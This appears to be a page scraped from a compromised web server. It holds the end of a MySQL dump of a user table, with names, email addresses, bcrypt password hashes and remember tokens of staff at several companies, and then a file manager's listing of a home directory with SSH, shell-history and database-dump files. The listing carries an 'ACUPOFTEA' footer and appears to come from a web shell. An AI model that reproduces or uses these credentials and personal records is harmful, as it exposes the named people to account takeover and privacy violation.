Olortegui','francis.olortegui@malldigitaltec.com.pe',NULL,'$2y$12$1jllSZyssDgvuJuaJ8hunePmzTgNo.h.pDhocWxFCdpCDrMjjLi3e','S','[\"2\",\"3\",\"4\",\"5\",\"6\",\"7\",\"15\",\"17\"]',NULL,'S','2025-01-03 03:35:30','2025-01-03 03:35:30'),(5,'William Taype','willjce@gmail.com',NULL,'$2y$12$V.Cj9/o4cwpI7qNqucfLzOkK8g46dVWvJd5.4zQdvTAB3J9ISG21u','S','[\"2\",\"3\",\"4\",\"5\",\"6\",\"7\",\"15\",\"17\"]','WcBWjNpJbnapRGJmw9sdRptvcVH05eiCoae8wq03ABTPbTBkxTRySrKIMtpn','S','2025-01-03 03:36:19','2025-01-03 03:36:19'),(6,'Antonella Ramirez','antonella.ramirez@malldigitaltec.com.pe',NULL,'$2y$12$PmxzQoU0SaXibA2GBiaia.jEQvXDZugXYW7zdpk3sOlhk/dX.4IPC','N','[\"5\",\"20\",\"21\",\"22\",\"36\"]','WB6HKkwS0EfUWbmhVu8ijJAjTo9S2jAihjdOHjxvGVFw2m6HQieUPQwcTvz5','S',NULL,NULL),(7,'Abel Curi','global@deltron.com.pe',NULL,'$2y$12$lg9/msfNVYETsKFWgD4rM.EB3cmdOJZ7dSR5ImPQyHmTUKiJobRdm','S','[\"2\",\"3\",\"4\",\"5\",\"6\",\"7\",\"12\",\"15\",\"16\",\"17\",\"18\",\"20\",\"21\",\"22\",\"24\",\"26\",\"29\",\"30\",\"31\",\"32\",\"33\",\"34\",\"35\",\"36\",\"37\",\"38\",\"39\"]',NULL,'S',NULL,NULL),(8,'Amaral Taype','amaral.taipe@deltron.com.pe',NULL,'$2y$12$YNj5MBvCQ0zSsrb0c9WTY.sZr/89Q5cnQEi/IYpqVtCtra95sTlbm','N','[\"31\"]',NULL,'S',NULL,NULL),(9,'Carolina Concha','carolina.concha@advanceperu.com',NULL,'$2y$12$6IjUPTqxlaq3TdbKRONiMOkuM.1lpzXeI6Zaoi5UrJQQ0F4hvOod6','N','[\"18\"]',NULL,'S',NULL,NULL),(10,'Belen Aliaga','belen.aliaga@loginstore.com',NULL,'$2y$12$luw2FSyBLBFVOTqZ7g5S7OKE0ZQTF3/3bVhZ.IlocZ0CpOIEmMbU2','N','[\"2\",\"3\",\"4\",\"5\",\"12\",\"16\",\"20\",\"21\",\"22\",\"33\",\"35\",\"36\",\"39\"]','Rht9WDTCxvbwgwqMIVVjPTP02TvqI7OOavtPl6yhNuuqoQH8FUHlx2TS27MV','S',NULL,NULL),(11,'Esequiel Castillo','esequiel.castillo@malldigitaltec.com.pe',NULL,'$2y$12$bEXlAWxgPIQ6KJXwAzi41.IUefyMDtugiGk1nKYv0RAB/COwSKU46','N','[\"20\",\"21\",\"22\",\"36\"]','zowo14wQKeaSmU1xSRPmXIh8fnyG4fud00piiL1zjxsbT1xxC0IT6nOR6wpu','S',NULL,NULL); /*!40000 ALTER TABLE `users` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `usuario_modulo_accion` -- DROP TABLE IF EXISTS `usuario_modulo_accion`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!50503 SET character_set_client = utf8mb4 */; CREATE TABLE `usuario_modulo_accion` ( `usuario_modulo_accion_id` int NOT NULL AUTO_INCREMENT, `usuario_id` int DEFAULT NULL, `accion_id` int DEFAULT NULL, `modulo_accion_id` int DEFAULT NULL, `usuario_modulo_accion_enabled` char(1) COLLATE utf8mb4_unicode_ci DEFAULT 'S', `usuario_modulo_accion_created` datetime NOT NULL DEFAULT CURRENT_TIMESTAMP, `usuario_modulo_accion_updated` datetime DEFAULT NULL, PRIMARY KEY (`usuario_modulo_accion_id`) ) ENGINE=InnoDB AUTO_INCREMENT=2 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `usuario_modulo_accion` -- LOCK TABLES `usuario_modulo_accion` WRITE; /*!40000 ALTER TABLE `usuario_modulo_accion` DISABLE KEYS */; INSERT INTO `usuario_modulo_accion` VALUES (1,2,1,1,'S','2025-11-07 17:29:43','2025-11-07 22:29:02'); /*!40000 ALTER TABLE `usuario_modulo_accion` ENABLE KEYS */; UNLOCK TABLES; /*!40103 SET TIME_ZONE=@OLD_TIME_ZONE */; /*!40101 SET SQL_MODE=@OLD_SQL_MODE */; /*!40014 SET FOREIGN_KEY_CHECKS=@OLD_FOREIGN_KEY_CHECKS */; /*!40014 SET UNIQUE_CHECKS=@OLD_UNIQUE_CHECKS */; /*!40101 SET CHARACTER_SET_CLIENT=@OLD_CHARACTER_SET_CLIENT */; /*!40101 SET CHARACTER_SET_RESULTS=@OLD_CHARACTER_SET_RESULTS */; /*!40101 SET COLLATION_CONNECTION=@OLD_COLLATION_CONNECTION */; /*!40111 SET SQL_NOTES=@OLD_SQL_NOTES */; -- Dump completed on 2026-03-07 11:55:30
New name for
Are you sure will delete
?
New date for
New perm for
Name
Type
Size
Permission
Last Modified
Actions
.
DIR
-
drwxrwxrwx
2026-03-07 04:55:50
..
DIR
-
drwxr-xr-x
2025-04-05 04:08:46
.cache
DIR
-
drwxr-xr-x
2025-02-05 03:31:12
.config
DIR
-
drwx------
2025-02-05 03:31:12
.filemin
DIR
-
drwxr-xr-x
2024-11-15 01:34:30
.gnupg
DIR
-
drwx------
2024-11-26 08:51:57
.launchpadlib
DIR
-
drwx------
2024-10-23 09:32:00
.local
DIR
-
drwxr-xr-x
2024-03-13 11:09:52
.npm
DIR
-
drwxr-xr-x
2024-11-28 09:57:18
.ssh
DIR
-
drwx------
2024-03-13 05:14:36
.tmp
DIR
-
drwxr-xr-x
2026-08-08 12:03:46
snap
DIR
-
drwx------
2024-03-13 05:14:38
.bash_history
12.3 KB
-rw-------
2026-06-25 06:46:10
.bashrc
text/plain
3.03 KB
-rw-r--r--
2021-10-15 10:06:05
.lesshst
20 B
-rw-------
2025-05-08 04:58:26
.mysql_history
72 B
-rw-------
2026-03-07 04:52:19
.profile
text/plain
161 B
-rw-r--r--
2019-07-09 10:05:50
.sudo_as_admin_successful
application/x-empty
0 B
-rw-r--r--
2024-03-13 11:24:31
.viminfo
10.61 KB
-rw-------
2025-10-15 11:24:41
blogloginstore.sql
text/plain
15.5 MB
-rw-r--r--
2026-03-07 04:53:28
error_log.txt
text/plain
11.06 GB
-rw-r--r--
2026-08-09 12:42:04
loginstore_newlive.sql
text/plain
808 B
-rw-r--r--
2026-03-07 04:56:57
ybgifvde_admin.sql
text/plain
26.44 KB
-rw-r--r--
2026-03-07 04:55:30
ybgifvde_store.sql
text/plain
1.44 GB
-rw-r--r--
2026-03-07 04:56:14
~ ACUPOFTEA - www.loginstore.com